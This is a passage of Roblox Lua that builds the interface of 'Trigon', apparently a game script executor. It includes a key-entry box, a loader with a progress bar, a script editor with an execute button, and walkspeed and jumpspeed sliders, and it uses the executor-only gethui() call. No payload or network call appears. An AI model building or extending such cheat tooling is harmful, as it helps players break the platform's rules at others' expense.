tbl.KeyBox.Position = UDim2.new(0.0761539, 0, 0.2579, 0) tbl.KeyBox.BackgroundTransparency = 1 tbl.KeyBox.TextSize = 14 tbl.KeyBox.ClipsDescendants = true tbl.KeyBox.Size = UDim2.new(0.856692, 0, 0.515946, 0) tbl.KeyBox.TextColor3 = Color3.fromRGB(203, 203, 203) tbl.KeyBox.BorderColor3 = Color3.fromRGB(49, 53, 66) tbl.KeyBox.Text = "ygtMMDhgF0l0DAROIsBQwctpoinGnwJp" tbl.KeyBox.Name = "KeyBox" tbl.KeyBox.ClearTextOnFocus = false tbl.KeyBox.Parent = tbl.aKeyContainer tbl.UICorner_2.CornerRadius = UDim.new(0.15, 0) tbl.UICorner_2.Parent = tbl.aKeyContainer tbl.Frame.BorderSizePixel = 0 tbl.Frame.Size = UDim2.new(0.888723, 0, 0.00191462, 0) tbl.Frame.Position = UDim2.new(0.0556134, 0, 0.530351, 0) tbl.Frame.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.Frame.BackgroundColor3 = Color3.fromRGB(62, 68, 86) tbl.Frame.Parent = tbl.KeySection tbl.SelectorFrame.BorderSizePixel = 0 tbl.SelectorFrame.Size = UDim2.new(1, 0, 1, 0) tbl.SelectorFrame.BackgroundTransparency = 1 tbl.SelectorFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.SelectorFrame.Visible = false tbl.SelectorFrame.Name = "SelectorFrame" tbl.SelectorFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.SelectorFrame.Parent = tbl.MainFrame tbl.Buttons_1.ZIndex = 4 tbl.Buttons_1.BorderSizePixel = 0 tbl.Buttons_1.Size = UDim2.new(1, 0, 0.610765, 0) tbl.Buttons_1.Position = UDim2.new(-0.00109042, 0, 0.28145, 0) tbl.Buttons_1.BackgroundTransparency = 1 tbl.Buttons_1.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.Buttons_1.Name = "Buttons" tbl.Buttons_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.Buttons_1.Parent = tbl.SelectorFrame tbl.OptionL.Active = false tbl.OptionL.BorderSizePixel = 5 tbl.OptionL.ScaleType = Enum.ScaleType.Fit tbl.OptionL.AutoButtonColor = false tbl.OptionL.BackgroundColor3 = Color3.fromRGB(44, 48, 61) tbl.OptionL.BorderMode = Enum.BorderMode.Inset tbl.OptionL.Size = UDim2.new(0.269343, 0, 0.774295, 0) tbl.OptionL.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.OptionL.Name = "OptionL" tbl.OptionL.Position = UDim2.new(0.0438047, 0, 0.112853, 0) tbl.OptionL.Parent = tbl.Buttons_1 tbl.UICorner_3.CornerRadius = UDim.new(0.08, 0) tbl.UICorner_3.Parent = tbl.OptionL tbl.UIStroke.LineJoinMode = Enum.LineJoinMode.Miter tbl.UIStroke.Thickness = 4 tbl.UIStroke.Color = Color3.fromRGB(60, 66, 83) tbl.UIStroke.Parent = tbl.OptionL tbl.ImageLabel_1.BorderSizePixel = 0 tbl.ImageLabel_1.ScaleType = Enum.ScaleType.Fit tbl.ImageLabel_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.ImageLabel_1.Image = "rbxassetid://15865854441" tbl.ImageLabel_1.Size = UDim2.new(0.769, 0, 0.691, 0) tbl.ImageLabel_1.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.ImageLabel_1.BackgroundTransparency = 1 tbl.ImageLabel_1.Position = UDim2.new(0.128502, 0, -0.00242697, 0) tbl.ImageLabel_1.Parent = tbl.OptionL tbl.TextLabel.TextWrapped = true tbl.TextLabel.BorderSizePixel = 0 tbl.TextLabel.TextScaled = true tbl.TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.TextLabel.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) tbl.TextLabel.TextSize = 14 tbl.TextLabel.Size = UDim2.new(0.69, 0, 0.174, 0) tbl.TextLabel.TextColor3 = Color3.fromRGB(207, 204, 204) tbl.TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.TextLabel.Text = "Low End" tbl.TextLabel.Position = UDim2.new(0.192, 0, 0.743, 0) tbl.TextLabel.BackgroundTransparency = 1 tbl.TextLabel.Parent = tbl.OptionL tbl.overlay.ZIndex = 99 tbl.overlay.BorderSizePixel = 0 tbl.overlay.Size = UDim2.new(1, 0, 1, 0) tbl.overlay.BackgroundTransparency = 0.2 tbl.overlay.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.overlay.Name = "overlay" tbl.overlay.BackgroundColor3 = Color3.fromRGB(38, 42, 53) tbl.overlay.Parent = tbl.OptionL tbl.UIListLayout_1.FillDirection = Enum.FillDirection.Horizontal tbl.UIListLayout_1.HorizontalAlignment = Enum.HorizontalAlignment.Center tbl.UIListLayout_1.VerticalAlignment = Enum.VerticalAlignment.Center tbl.UIListLayout_1.SortOrder = Enum.SortOrder.LayoutOrder tbl.UIListLayout_1.Padding = UDim.new(0.05, 0) tbl.UIListLayout_1.Parent = tbl.Buttons_1 tbl.OptionR.BorderSizePixel = 5 tbl.OptionR.ScaleType = Enum.ScaleType.Fit tbl.OptionR.AutoButtonColor = false tbl.OptionR.BackgroundColor3 = Color3.fromRGB(44, 48, 61) tbl.OptionR.BorderMode = Enum.BorderMode.Inset tbl.OptionR.Size = UDim2.new(0.269343, 0, 0.774295, 0) tbl.OptionR.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.OptionR.Name = "OptionR" tbl.OptionR.Position = UDim2.new(0.382289, 0, 0.112853, 0) tbl.OptionR.Parent = tbl.Buttons_1 tbl.UIStroke_1.LineJoinMode = Enum.LineJoinMode.Miter tbl.UIStroke_1.Thickness = 4 tbl.UIStroke_1.Color = Color3.fromRGB(60, 66, 83) tbl.UIStroke_1.Parent = tbl.OptionR tbl.ImageLabel_2.BorderSizePixel = 0 tbl.ImageLabel_2.ScaleType = Enum.ScaleType.Fit tbl.ImageLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.ImageLabel_2.Image = "rbxassetid://15865857319" tbl.ImageLabel_2.Size = UDim2.new(0.768635, 0, 0.690602, 0) tbl.ImageLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.ImageLabel_2.BackgroundTransparency = 1 tbl.ImageLabel_2.Position = UDim2.new(0.140513, 0, 0.0680589, 0) tbl.ImageLabel_2.Parent = tbl.OptionR tbl.TextLabel_1.TextWrapped = true tbl.TextLabel_1.BorderSizePixel = 0 tbl.TextLabel_1.TextScaled = true tbl.TextLabel_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.TextLabel_1.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) tbl.TextLabel_1.TextSize = 14 tbl.TextLabel_1.Size = UDim2.new(0.690137, 0, 0.17419, 0) tbl.TextLabel_1.TextColor3 = Color3.fromRGB(207, 204, 204) tbl.TextLabel_1.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.TextLabel_1.Text = "Normal" tbl.TextLabel_1.Position = UDim2.new(0.192185, 0, 0.743299, 0) tbl.TextLabel_1.BackgroundTransparency = 1 tbl.TextLabel_1.Parent = tbl.OptionR tbl.UICorner_4.CornerRadius = UDim.new(0.1, 0) tbl.UICorner_4.Parent = tbl.OptionR tbl.OptionH.BorderSizePixel = 5 tbl.OptionH.ScaleType = Enum.ScaleType.Fit tbl.OptionH.AutoButtonColor = false tbl.OptionH.BackgroundColor3 = Color3.fromRGB(44, 48, 61) tbl.OptionH.BorderMode = Enum.BorderMode.Inset tbl.OptionH.Size = UDim2.new(0.269343, 0, 0.774295, 0) tbl.OptionH.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.OptionH.Name = "OptionH" tbl.OptionH.Position = UDim2.new(0.0438047, 0, 0.112853, 0) tbl.OptionH.Parent = tbl.Buttons_1 tbl.UICorner_5.CornerRadius = UDim.new(0.1, 0) tbl.UICorner_5.Parent = tbl.OptionH tbl.UIStroke_2.LineJoinMode = Enum.LineJoinMode.Miter tbl.UIStroke_2.Thickness = 4 tbl.UIStroke_2.Color = Color3.fromRGB(60, 66, 83) tbl.UIStroke_2.Parent = tbl.OptionH tbl.ImageLabel_3.BorderSizePixel = 0 tbl.ImageLabel_3.ScaleType = Enum.ScaleType.Fit tbl.ImageLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.ImageLabel_3.Image = "rbxassetid://15865858307" tbl.ImageLabel_3.Size = UDim2.new(0.769, 0, 0.691, 0) tbl.ImageLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.ImageLabel_3.BackgroundTransparency = 1 tbl.ImageLabel_3.Position = UDim2.new(0.141, 0, 0.068, 0) tbl.ImageLabel_3.Parent = tbl.OptionH tbl.TextLabel_2.TextWrapped = true tbl.TextLabel_2.BorderSizePixel = 0 tbl.TextLabel_2.TextScaled = true tbl.TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.TextLabel_2.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) tbl.TextLabel_2.TextSize = 14 tbl.TextLabel_2.Size = UDim2.new(0.69, 0, 0.174, 0) tbl.TextLabel_2.TextColor3 = Color3.fromRGB(207, 204, 204) tbl.TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.TextLabel_2.Text = "Emulator" tbl.TextLabel_2.Position = UDim2.new(0.192, 0, 0.743, 0) tbl.TextLabel_2.BackgroundTransparency = 1 tbl.TextLabel_2.Parent = tbl.OptionH tbl.overlay_1.ZIndex = 99 tbl.overlay_1.BorderSizePixel = 0 tbl.overlay_1.Size = UDim2.new(1, 0, 1, 0) tbl.overlay_1.BackgroundTransparency = 0.2 tbl.overlay_1.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.overlay_1.Name = "overlay" tbl.overlay_1.BackgroundColor3 = Color3.fromRGB(38, 42, 53) tbl.overlay_1.Parent = tbl.OptionH tbl.Title_2.TextWrapped = true tbl.Title_2.BorderSizePixel = 0 tbl.Title_2.TextScaled = true tbl.Title_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.Title_2.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) tbl.Title_2.TextSize = 14 tbl.Title_2.Name = "Title" tbl.Title_2.Size = UDim2.new(0.998909, 0, 0.139768, 0) tbl.Title_2.TextColor3 = Color3.fromRGB(180, 193, 216) tbl.Title_2.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.Title_2.Text = "Select an option" tbl.Title_2.Position = UDim2.new(0.00218095, 0, 0.116792, 0) tbl.Title_2.BackgroundTransparency = 1 tbl.Title_2.Parent = tbl.SelectorFrame tbl.CloseBtn.ImageColor3 = Color3.fromRGB(165, 182, 230) tbl.CloseBtn.BorderSizePixel = 0 tbl.CloseBtn.ScaleType = Enum.ScaleType.Fit tbl.CloseBtn.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.CloseBtn.Image = "rbxassetid://15866029769" tbl.CloseBtn.Size = UDim2.new(0.0711809, 0, 0.124451, 0) tbl.CloseBtn.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.CloseBtn.Name = "CloseBtn" tbl.CloseBtn.BackgroundTransparency = 1 tbl.CloseBtn.Position = UDim2.new(0.921436, 0, 0.0172316, 0) tbl.CloseBtn.ImageTransparency = 0.51 tbl.CloseBtn.Parent = tbl.SelectorFrame tbl.UICorner_6.CornerRadius = UDim.new(0.03, 0) tbl.UICorner_6.Parent = tbl.SelectorFrame tbl.LoaderFrame.BorderSizePixel = 0 tbl.LoaderFrame.Size = UDim2.new(1, 0, 1, 0) tbl.LoaderFrame.BackgroundTransparency = 1 tbl.LoaderFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.LoaderFrame.Name = "LoaderFrame" tbl.LoaderFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.LoaderFrame.Parent = tbl.MainFrame tbl.ImageLabel_4.BorderSizePixel = 0 tbl.ImageLabel_4.ScaleType = Enum.ScaleType.Fit tbl.ImageLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.ImageLabel_4.Image = "rbxassetid://15844306310" tbl.ImageLabel_4.Size = UDim2.new(1, 0, 0.387093, 0) tbl.ImageLabel_4.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.ImageLabel_4.BackgroundTransparency = 1 tbl.ImageLabel_4.Position = UDim2.new(8.62644e-08, 0, 0.0929012, 0) tbl.ImageLabel_4.Parent = tbl.LoaderFrame tbl.list.AnchorPoint = Vector2.new(0.5, 0.5) tbl.list.BorderSizePixel = 0 tbl.list.Size = UDim2.new(0.856923, 0, 0.435747, 0) tbl.list.Position = UDim2.new(0.499928, 0, 0.782127, 0) tbl.list.BackgroundTransparency = 1 tbl.list.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.list.Name = "list" tbl.list.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.list.Parent = tbl.LoaderFrame tbl.UIListLayout_2.HorizontalAlignment = Enum.HorizontalAlignment.Center tbl.UIListLayout_2.Padding = UDim.new(0.07, 0) tbl.UIListLayout_2.Parent = tbl.list tbl.Frame_1.BorderSizePixel = 0 tbl.Frame_1.Size = UDim2.new(0.929634, 0, 0.188937, 0) tbl.Frame_1.Position = UDim2.new(0.0351828, 0, 0, 0) tbl.Frame_1.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.Frame_1.BackgroundColor3 = Color3.fromRGB(44, 48, 61) tbl.Frame_1.Parent = tbl.list tbl.UICorner_7.CornerRadius = UDim.new(0.2, 0) tbl.UICorner_7.Parent = tbl.Frame_1 tbl.Bar.BorderSizePixel = 0 tbl.Bar.Size = UDim2.new(0.985534, 0, 0.793589, 0) tbl.Bar.Position = UDim2.new(0.00723917, 0, 0.0930243, 0) tbl.Bar.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.Bar.Name = "Bar" tbl.Bar.BackgroundColor3 = Color3.fromRGB(74, 82, 103) tbl.Bar.Parent = tbl.Frame_1 tbl.UICorner_8.CornerRadius = UDim.new(0.2, 0) tbl.UICorner_8.Parent = tbl.Bar tbl.Title_3.TextWrapped = true tbl.Title_3.BorderSizePixel = 0 tbl.Title_3.TextScaled = true tbl.Title_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.Title_3.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) tbl.Title_3.TextSize = 14 tbl.Title_3.Name = "Title" tbl.Title_3.Size = UDim2.new(0.998909, 0, 0.149594, 0) tbl.Title_3.TextColor3 = Color3.fromRGB(180, 193, 216) tbl.Title_3.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.Title_3.Text = "Status: " tbl.Title_3.Position = UDim2.new(0.000545285, 0, 0.258937, 0) tbl.Title_3.BackgroundTransparency = 1 tbl.Title_3.Parent = tbl.list tbl.CloseBtn_1.ImageColor3 = Color3.fromRGB(165, 182, 230) tbl.CloseBtn_1.BorderSizePixel = 0 tbl.CloseBtn_1.ScaleType = Enum.ScaleType.Fit tbl.CloseBtn_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.CloseBtn_1.Image = "rbxassetid://15866029769" tbl.CloseBtn_1.Size = UDim2.new(0.0711809, 0, 0.124451, 0) tbl.CloseBtn_1.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.CloseBtn_1.Name = "CloseBtn" tbl.CloseBtn_1.BackgroundTransparency = 1 tbl.CloseBtn_1.Position = UDim2.new(0.921436, 0, 0.0172316, 0) tbl.CloseBtn_1.ImageTransparency = 0.51 tbl.CloseBtn_1.Parent = tbl.LoaderFrame tbl.LocalScript.Parent = tbl.MainFrame tbl.TrigonLogo.BorderSizePixel = 0 tbl.TrigonLogo.ScaleType = Enum.ScaleType.Fit tbl.TrigonLogo.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.TrigonLogo.Image = "rbxassetid://15844306310" tbl.TrigonLogo.Size = UDim2.new(0.5, 0, 0.747768, 0) tbl.TrigonLogo.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.TrigonLogo.Name = "TrigonLogo" tbl.TrigonLogo.BackgroundTransparency = 1 tbl.TrigonLogo.Position = UDim2.new(0.249108, 0, 0.125064, 0) tbl.TrigonLogo.Visible = false tbl.TrigonLogo.Parent = tbl.MainFrame task.spawn(function() local script = tbl.LocalScript local TweenService = game:GetService("TweenService") local CurrentValue = 1 local MainFrame = script.Parent local Bar = MainFrame.LoaderFrame.list.Frame.Bar local MaxValue = 100 local Status = MainFrame.LoaderFrame.list.Title local TweenService = game:GetService("TweenService") local OptionR = MainFrame.SelectorFrame.Buttons.OptionR local Loader = gethui():WaitForChild("TrigonLoader") local MainUI = gethui():WaitForChild("TrigonMain") wait(1) local function ProgressBar(value, statusText, duration) CurrentValue = CurrentValue + value if CurrentValue > MaxValue then CurrentValue = MaxValue elseif CurrentValue < 0 then CurrentValue = 0 end local tweenInfo = TweenInfo.new(duration, Enum.EasingStyle.Linear, Enum.EasingDirection.Out) local tween = TweenService:Create(Bar, tweenInfo, {Size = UDim2.new(CurrentValue / MaxValue, 0, 0.8, 0)}) tween:Play() Status.Text = "Status: " .. (statusText or "") end Bar.Size = UDim2.new(0, 0, 0.8, 0) ProgressBar(50, "Checking for game scripts...", 1) wait(1) ProgressBar(20, "Finalizing everything...", 1) local buttonx23 = topbar("Trigon", "rbxassetid://15844306310", true) wait(1) ProgressBar(30, "Setup Complete!", 1) wait(0.5) MainFrame.LoaderFrame.Visible = false --MainFrame.SelectorFrame.Visible = true local function loadtrigon() Loader.Enabled = false MainUI.Enabled = true print(MainUI.Enabled) end repeat task.wait() until Loader and MainUI OptionR.Activated:Connect(function() end) loadtrigon() end) end function main() local trii = { TrigonMain = Instance.new("ScreenGui"), MainFrame = Instance.new("Frame"), BottomMenuFrame = Instance.new("Frame"), LeftFrame = Instance.new("Frame"), ExitBtn = Instance.new("ImageButton"), Icon = Instance.new("ImageLabel"), UICorner = Instance.new("UICorner"), RightFrame = Instance.new("Frame"), Button = Instance.new("ImageButton"), UIGradient = Instance.new("UIGradient"), Icon_1 = Instance.new("ImageLabel"), MenuList = Instance.new("Frame"), UICorner_1 = Instance.new("UICorner"), UIGridLayout = Instance.new("UIGridLayout"), HBtn = Instance.new("ImageButton"), UIGradient_1 = Instance.new("UIGradient"), Icon_2 = Instance.new("ImageLabel"), UIStroke = Instance.new("UIStroke"), UICorner_2 = Instance.new("UICorner"), ExecBtn = Instance.new("ImageButton"), Icon_3 = Instance.new("ImageLabel"), UIStroke_1 = Instance.new("UIStroke"), UICorner_3 = Instance.new("UICorner"), UIGradient_2 = Instance.new("UIGradient"), CloudBtn = Instance.new("ImageButton"), UIGradient_3 = Instance.new("UIGradient"), Icon_4 = Instance.new("ImageLabel"), UIStroke_2 = Instance.new("UIStroke"), UICorner_4 = Instance.new("UICorner"), SettingsBtn = Instance.new("ImageButton"), UIGradient_4 = Instance.new("UIGradient"), Icon_5 = Instance.new("ImageLabel"), UIStroke_3 = Instance.new("UIStroke"), UICorner_5 = Instance.new("UICorner"), UICorner_6 = Instance.new("UICorner"), logFrame = Instance.new("Frame"), UICorner_7 = Instance.new("UICorner"), logButtons = Instance.new("Frame"), logOutput = Instance.new("Frame"), Button_1 = Instance.new("ImageButton"), TextLabel = Instance.new("TextLabel"), UIListLayout = Instance.new("UIListLayout"), UIListLayout_1 = Instance.new("UIListLayout"), logWarning = Instance.new("Frame"), Button_2 = Instance.new("ImageButton"), TextLabel_1 = Instance.new("TextLabel"), UIListLayout_2 = Instance.new("UIListLayout"), logError = Instance.new("Frame"), Button_3 = Instance.new("ImageButton"), TextLabel_2 = Instance.new("TextLabel"), UIListLayout_3 = Instance.new("UIListLayout"), logInfo = Instance.new("Frame"), Button_4 = Instance.new("ImageButton"), TextLabel_3 = Instance.new("TextLabel"), UIListLayout_4 = Instance.new("UIListLayout"), cclrbtn = Instance.new("ImageButton"), Title = Instance.new("TextLabel"), UICorner_8 = Instance.new("UICorner"), UIStroke_4 = Instance.new("UIStroke"), excp = Instance.new("ImageButton"), Title_1 = Instance.new("TextLabel"), UICorner_9 = Instance.new("UICorner"), UIStroke_5 = Instance.new("UIStroke"), TextLabel_4 = Instance.new("TextLabel"), consoleFrame = Instance.new("ScrollingFrame"), GlobalLog = Instance.new("LocalScript"), TextBox = Instance.new("TextLabel"), SettingsFrame = Instance.new("Frame"), UICorner_10 = Instance.new("UICorner"), sample = Instance.new("Frame"), UIListLayout_5 = Instance.new("UIListLayout"), UICorner_11 = Instance.new("UICorner"), Title_2 = Instance.new("TextLabel"), Title_3 = Instance.new("TextLabel"), Title_4 = Instance.new("TextLabel"), ImageLabel = Instance.new("ImageLabel"), homeFrame = Instance.new("Frame"), UICorner_12 = Instance.new("UICorner"), changelogFrame = Instance.new("ScrollingFrame"), ScriptBox = Instance.new("TextBox"), UICorner_13 = Instance.new("UICorner"), UIListLayout_6 = Instance.new("UIListLayout"), scriptsFrame = Instance.new("ScrollingFrame"), UICorner_14 = Instance.new("UICorner"), UIListLayout_7 = Instance.new("UIListLayout"), _GameHeader = Instance.new("Frame"), Title_5 = Instance.new("TextLabel"), UICorner_15 = Instance.new("UICorner"), TextButton = Instance.new("TextButton"), UICorner_16 = Instance.new("UICorner"), localplrFrame = Instance.new("Frame"), UIListLayout_8 = Instance.new("UIListLayout"), Header = Instance.new("Frame"), Title_6 = Instance.new("TextLabel"), UICorner_17 = Instance.new("UICorner"), walkspeed = Instance.new("Frame"), Slider = Instance.new("Frame"), Image = Instance.new("Frame"), Bar_Background = Instance.new("Frame"), UICorner_18 = Instance.new("UICorner"), Bar_Foreground = Instance.new("Frame"), UICorner_19 = Instance.new("UICorner"), Thumb = Instance.new("ImageLabel"), UIAspectRatioConstraint = Instance.new("UIAspectRatioConstraint"), Thumb_Pressed = Instance.new("ImageLabel"), Configuration = Instance.new("Configuration"), ObjectBarBackground = Instance.new("ObjectValue"), ObjectBarForeground = Instance.new("ObjectValue"), ObjectThumbNormal = Instance.new("ObjectValue"), ObjectThumbPressed = Instance.new("ObjectValue"), Title_7 = Instance.new("TextLabel"), jumspeed = Instance.new("Frame"), Slider_1 = Instance.new("Frame"), Image_1 = Instance.new("Frame"), Bar_Background_1 = Instance.new("Frame"), UICorner_20 = Instance.new("UICorner"), Bar_Foreground_1 = Instance.new("Frame"), UICorner_21 = Instance.new("UICorner"), Thumb_1 = Instance.new("ImageLabel"), UIAspectRatioConstraint_1 = Instance.new("UIAspectRatioConstraint"), Thumb_Pressed_1 = Instance.new("ImageLabel"), Configuration_1 = Instance.new("Configuration"), ObjectBarBackground_1 = Instance.new("ObjectValue"), ObjectBarForeground_1 = Instance.new("ObjectValue"), ObjectThumbNormal_1 = Instance.new("ObjectValue"), ObjectThumbPressed_1 = Instance.new("ObjectValue"), Scripts = Instance.new("Folder"), FormSliderHorizontalLocalScript = Instance.new("LocalScript"), Title_8 = Instance.new("TextLabel"), LocalPlayerHandle = Instance.new("LocalScript"), FormSliderClass = Instance.new("ModuleScript"), ExtendDraggableClass = Instance.new("ModuleScript"), CurPos = Instance.new("TextLabel"), localscriptsFrame = Instance.new("ScrollingFrame"), UICorner_22 = Instance.new("UICorner"), UIListLayout_9 = Instance.new("UIListLayout"), _GameHeader_1 = Instance.new("Frame"), Title_9 = Instance.new("TextLabel"), UICorner_23 = Instance.new("UICorner"), Add_btn = Instance.new("Frame"), TextButton_1 = Instance.new("TextButton"), UICorner_24 = Instance.new("UICorner"), script_placeholder = Instance.new("Frame"), scriptTitle = Instance.new("TextLabel"), Buttons = Instance.new("Frame"), UIListLayout_10 = Instance.new("UIListLayout"), run = Instance.new("Frame"), UIListLayout_11 = Instance.new("UIListLayout"), UICorner_25 = Instance.new("UICorner"), button = Instance.new("ImageButton"), autoload = Instance.new("Frame"), UIListLayout_12 = Instance.new("UIListLayout"), button_1 = Instance.new("ImageButton"), zz = Instance.new("TextLabel"), UICorner_26 = Instance.new("UICorner"), delete = Instance.new("Frame"), UIListLayout_13 = Instance.new("UIListLayout"), UICorner_27 = Instance.new("UICorner"), button_2 = Instance.new("ImageButton"), UICorner_28 = Instance.new("UICorner"), addlocalscriptsFrame = Instance.new("ScrollingFrame"), UICorner_29 = Instance.new("UICorner"), UIListLayout_14 = Instance.new("UIListLayout"), _GameHeader_2 = Instance.new("Frame"), Title_10 = Instance.new("TextLabel"), UICorner_30 = Instance.new("UICorner"), Frame = Instance.new("Frame"), TextButton_2 = Instance.new("TextButton"), UICorner_31 = Instance.new("UICorner"), addFrame = Instance.new("Frame"), input = Instance.new("Frame"), TextBox_1 = Instance.new("TextBox"), Title_11 = Instance.new("TextLabel"), TextLabel_5 = Instance.new("TextLabel"), confrim_btn = Instance.new("Frame"), TextButton_3 = Instance.new("TextButton"), UICorner_32 = Instance.new("UICorner"), cancel_btn = Instance.new("Frame"), TextButton_4 = Instance.new("TextButton"), UICorner_33 = Instance.new("UICorner"), ExecFrame = Instance.new("Frame"), Buttons_1 = Instance.new("Frame"), UIListLayout_15 = Instance.new("UIListLayout"), Button1 = Instance.new("ImageButton"), UIStroke_6 = Instance.new("UIStroke"), UICorner_34 = Instance.new("UICorner"), Title_12 = Instance.new("TextLabel"), Button4 = Instance.new("ImageButton"), Title_13 = Instance.new("TextLabel"), UICorner_35 = Instance.new("UICorner"), UIStroke_7 = Instance.new("UIStroke"), Button3 = Instance.new("ImageButton"), Title_14 = Instance.new("TextLabel"), UICorner_36 = Instance.new("UICorner"), UIStroke_8 = Instance.new("UIStroke"), Button2 = Instance.new("ImageButton"), Title_15 = Instance.new("TextLabel"), UICorner_37 = Instance.new("UICorner"), UIStroke_9 = Instance.new("UIStroke"), UICorner_38 = Instance.new("UICorner"), ScrollingFrame = Instance.new("ScrollingFrame"), LocalScript = Instance.new("LocalScript"), ScriptBox_1 = Instance.new("TextBox"), Highlighter = Instance.new("ModuleScript"), lexer = Instance.new("ModuleScript"), language = Instance.new("ModuleScript"), theme = Instance.new("ModuleScript"), types = Instance.new("ModuleScript"), utility = Instance.new("ModuleScript"), UICorner_39 = Instance.new("UICorner"), LocalScript_1 = Instance.new("LocalScript"), savescripts = Instance.new("LocalScript") } trii.TrigonMain.ScreenInsets = Enum.ScreenInsets.DeviceSafeInsets trii.TrigonMain.IgnoreGuiInset = true trii.TrigonMain.ZIndexBehavior = Enum.ZIndexBehavior.Sibling trii.TrigonMain.Name = "TrigonMain" trii.TrigonMain.Parent = gethui() trii.TrigonMain.Enabled = false trii.MainFrame.BorderSizePixel = 0 trii.MainFrame.Size = UDim2.new(1.0005, 0, 1, 0) trii.MainFrame.BackgroundTransparency = 0.35 trii.MainFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.MainFrame.Name = "MainFrame" trii.MainFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0) trii.MainFrame.Parent = trii.TrigonMain trii.BottomMenuFrame.BorderSizePixel = 0 trii.BottomMenuFrame.Size = UDim2.new(0.950071, 0, 0.195095, 0) trii.BottomMenuFrame.Position = UDim2.new(0.0244645, 0, 0.755853, 0) trii.BottomMenuFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.BottomMenuFrame.ClipsDescendants = true trii.BottomMenuFrame.Name = "BottomMenuFrame" trii.BottomMenuFrame.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.BottomMenuFrame.Parent = trii.MainFrame trii.LeftFrame.BorderSizePixel = 0 trii.LeftFrame.Size = UDim2.new(0.162271, 0, 1, 0) trii.LeftFrame.Position = UDim2.new(-0.00054132, 0, 0, 0) trii.LeftFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.LeftFrame.Name = "LeftFrame" trii.LeftFrame.BackgroundColor3 = Color3.fromRGB(47, 52, 66) trii.LeftFrame.Parent = trii.BottomMenuFrame trii.ExitBtn.ZIndex = 2 trii.ExitBtn.BorderSizePixel = 0 trii.ExitBtn.ScaleType = Enum.ScaleType.Fit trii.ExitBtn.AutoButtonColor = false trii.ExitBtn.BackgroundColor3 = Color3.fromRGB(47, 52, 66) trii.ExitBtn.Selectable = false trii.ExitBtn.AnchorPoint = Vector2.new(0.5, 0.5) trii.ExitBtn.Size = UDim2.new(0.891645, 0, 0.893438, 0) trii.ExitBtn.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.ExitBtn.Name = "ExitBtn" trii.ExitBtn.Position = UDim2.new(0.508863, 0, 0.5, 0) trii.ExitBtn.Parent = trii.LeftFrame trii.Icon.ImageColor3 = Color3.fromRGB(201, 205, 210) trii.Icon.SizeConstraint = Enum.SizeConstraint.RelativeXX trii.Icon.BorderSizePixel = 0 trii.Icon.ScaleType = Enum.ScaleType.Fit trii.Icon.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Icon.AnchorPoint = Vector2.new(0.5, 0.5) trii.Icon.Image = "rbxassetid://15879382339" trii.Icon.Size = UDim2.new(0.834218, 0, 12.9208, 0) trii.Icon.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Icon.Name = "Icon" trii.Icon.BackgroundTransparency = 1 trii.Icon.Position = UDim2.new(0.494743, 0, 0.490654, 0) trii.Icon.Parent = trii.ExitBtn trii.UICorner.CornerRadius = UDim.new(0.08, 0) trii.UICorner.Parent = trii.LeftFrame trii.RightFrame.BorderSizePixel = 0 trii.RightFrame.Size = UDim2.new(0.111862, 0, 1, 0) 